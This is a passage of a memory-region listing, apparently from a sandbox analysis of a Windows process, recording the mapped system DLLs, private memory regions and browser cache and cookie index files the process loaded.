0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 358 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 359 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 360 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 361 start_va = 0x74a10000 end_va = 0x74a21fff monitored = 0 entry_point = 0x74a11200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 362 start_va = 0x755b0000 end_va = 0x756a4fff monitored = 0 entry_point = 0x755b1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 363 start_va = 0x751c0000 end_va = 0x75216fff monitored = 0 entry_point = 0x751d9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 364 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 365 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 366 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 367 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 368 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 369 start_va = 0x74de0000 end_va = 0x74f15fff monitored = 0 entry_point = 0x74de1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 370 start_va = 0x75740000 end_va = 0x7589bfff monitored = 0 entry_point = 0x7578ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 371 start_va = 0x75130000 end_va = 0x751befff monitored = 0 entry_point = 0x75133fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 372 start_va = 0x74ab0000 end_va = 0x74bd0fff monitored = 0 entry_point = 0x74ab158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 373 start_va = 0x76ed0000 end_va = 0x76edbfff monitored = 0 entry_point = 0x76ed238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 374 start_va = 0x74f30000 end_va = 0x7512afff monitored = 0 entry_point = 0x74f322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 375 start_va = 0x749d0000 end_va = 0x74a01fff monitored = 0 entry_point = 0x749d37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 376 start_va = 0x75be0000 end_va = 0x76829fff monitored = 0 entry_point = 0x75c61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 377 start_va = 0x74830000 end_va = 0x7484bfff monitored = 0 entry_point = 0x7483a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 378 start_va = 0x76960000 end_va = 0x76965fff monitored = 0 entry_point = 0x76961782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 379 start_va = 0x74820000 end_va = 0x74826fff monitored = 0 entry_point = 0x7482128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 380 start_va = 0x75960000 end_va = 0x75994fff monitored = 0 entry_point = 0x7596145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 381 start_va = 0x74850000 end_va = 0x74893fff monitored = 0 entry_point = 0x748663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 382 start_va = 0x2b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 383 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 384 start_va = 0x6d0000 end_va = 0x857fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 385 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 386 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 387 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 388 start_va = 0x860000 end_va = 0x9e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 389 start_va = 0x9f0000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 390 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 391 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 392 start_va = 0x1df0000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 393 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 394 start_va = 0x73a90000 end_va = 0x73c2dfff monitored = 0 entry_point = 0x73abe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 395 start_va = 0x220000 end_va = 0x220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 396 start_va = 0x2b0000 end_va = 0x2b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 397 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 398 start_va = 0x1f60000 end_va = 0x222efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 399 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 400 start_va = 0x748d0000 end_va = 0x748dafff monitored = 0 entry_point = 0x748d1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 401 start_va = 0x2c0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 402 start_va = 0x2d0000 end_va = 0x2d7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 403 start_va = 0x2e0000 end_va = 0x2f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 404 start_va = 0x74f20000 end_va = 0x74f22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 405 start_va = 0x300000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 406 start_va = 0x1df0000 end_va = 0x1eeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 407 start_va = 0x1f20000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 408 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 409 start_va = 0x73950000 end_va = 0x739a1fff monitored = 0 entry_point = 0x739514be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 410 start_va = 0x73930000 end_va = 0x73944fff monitored = 0 entry_point = 0x739312de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 411 start_va = 0x73920000 end_va = 0x7392cfff monitored = 0 entry_point = 0x73921326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 412 start_va = 0x340000 end_va = 0x340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 413 start_va = 0x340000 end_va = 0x340fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 414 start_va = 0x350000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 415 start_va = 0x3c0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 416 start_va = 0x2230000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 417 start_va = 0x2330000 end_va = 0x242ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 418 start_va = 0x73910000 end_va = 0x73915fff monitored = 0 entry_point = 0x7391125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 419 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 420 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 421 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 422 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 423 start_va = 0x2430000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 424 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 425 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 426 start_va = 0x2530000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 427 start_va = 0x749b0000 end_va = 0x749c6fff monitored = 0 entry_point = 0x749b1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 428 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 429 start_va = 0x76830000 end_va = 0x7685efff monitored = 0 entry_point = 0x76832a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 430 start_va = 0x74970000 end_va = 0x749aefff monitored = 0 entry_point = 0x74972351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 431 start_va = 0x73900000 end_va = 0x7390ffff monitored = 0 entry_point = 0x739038c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 432 start_va = 0x2630000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 433 start_va = 0x27b0000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 434 start_va = 0x2630000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 435 start_va = 0x27a0000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 436 start_va = 0x747b0000 end_va = 0x747b5fff monitored = 0 entry_point = 0x747b14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 437 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 438 start_va = 0x2630000 end_va = 0x272ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 439 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 440 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 441 start_va = 0x733a0000 end_va = 0x733a8fff monitored = 0 entry_point = 0x733a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 442 start_va = 0x3a0000 end_va = 0x3a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 443 start_va = 0x2730000 end_va = 0x276ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 444 start_va = 0x747e0000 end_va = 0x7481bfff monitored = 0 entry_point = 0x747e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 445 start_va = 0x27b0000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 446 start_va = 0x2980000 end_va = 0x298ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 447 start_va = 0x747d0000 end_va = 0x747d4fff monitored = 0 entry_point = 0x747d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 448 start_va = 0x747c0000 end_va = 0x747c5fff monitored = 0 entry_point = 0x747c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 449 start_va = 0x73a50000 end_va = 0x73a87fff monitored = 0 entry_point = 0x73a5990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 450 start_va = 0x2860000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 451 start_va = 0x27b0000 end_va = 0x27effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 452 start_va = 0x2820000 end_va = 0x285ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 453 start_va = 0x2990000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 454 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 455 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 456 start_va = 0x5c0000 end_va = 0x5c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 457 start_va = 0x74960000 end_va = 0x74967fff monitored = 0 entry_point = 0x749634d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 458 start_va = 0x5c0000 end_va = 0x5c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 459 start_va = 0x74950000 end_va = 0x74957fff monitored = 0 entry_point = 0x749510e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 460 start_va = 0x71ea0000 end_va = 0x71ed7fff monitored = 0 entry_point = 0x71ea1489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 461 start_va = 0x74930000 end_va = 0x74946fff monitored = 0 entry_point = 0x749335fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 462 start_va = 0x71e60000 end_va = 0x71e9cfff monitored = 0 entry_point = 0x71e610f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 463 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 464 start_va = 0x2860000 end_va = 0x289bfff monitored = 0 entry_point = 0x286128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 465 start_va = 0x28c0000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 466 start_va = 0x2860000 end_va = 0x289bfff monitored = 0 entry_point = 0x286128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 467 start_va = 0x2860000 end_va = 0x289bfff monitored = 0 entry_point = 0x286128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 468 start_va = 0x2860000 end_va = 0x289bfff monitored = 0 entry_point = 0x286128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 469 start_va = 0x2860000 end_va = 0x289bfff monitored = 0 entry_point = 0x286128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 470 start_va = 0x73860000 end_va = 0x7389afff monitored = 0 entry_point = 0x7386128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 471 start_va = 0x2a90000 end_va = 0x2b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a90000" filename = "" Region: id = 472 start_va = 0x71e40000 end_va = 0x71e55fff monitored = 0 entry_point = 0x71e42061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 841 start_va = 0x5c0000 end_va = 0x5c9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 842 start_va = 0x75950000 end_va = 0x75954fff monitored = 0 entry_point = 0x75951438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 843 start_va = 0x2b90000 end_va = 0x2d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 892 start_va = 0x739d0000 end_va = 0x73a4ffff monitored = 0 entry_point = 0x739e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 893 start_va = 0x2d90000 end_va = 0x2e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 894 start_va = 0x2e40000 end_va = 0x2f1efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002e40000" filename = "" Region: id = 895 start_va = 0x1ef0000 end_va = 0x1ef0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 896 start_va = 0x754c0000 end_va = 0x75542fff monitored = 0 entry_point = 0x754c23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 897 start_va = 0x1f00000 end_va = 0x1f00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f00000" filename = "" Region: id = 898 start_va = 0x71dc0000 end_va = 0x71e3cfff monitored = 0 entry_point = 0x71dc166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 899 start_va = 0x1f10000 end_va = 0x1f10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 900 start_va = 0x2770000 end_va = 0x2776fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 901 start_va = 0x1f10000 end_va = 0x1f10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 902 start_va = 0x2770000 end_va = 0x2776fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 903 start_va = 0x732e0000 end_va = 0x7330efff monitored = 0 entry_point = 0x732e1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 904 start_va = 0x2860000 end_va = 0x289ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 905 start_va = 0x2f20000 end_va = 0x301ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f20000" filename = "" Region: id = 906 start_va = 0x736e0000 end_va = 0x737d4fff monitored = 0 entry_point = 0x736f0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 907 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 908 start_va = 0x1ef0000 end_va = 0x1ef1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 909 start_va = 0x1f10000 end_va = 0x1f10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f10000" filename = "" Region: id = 910 start_va = 0x2770000 end_va = 0x2773fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 911 start_va = 0x27f0000 end_va = 0x2815fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = 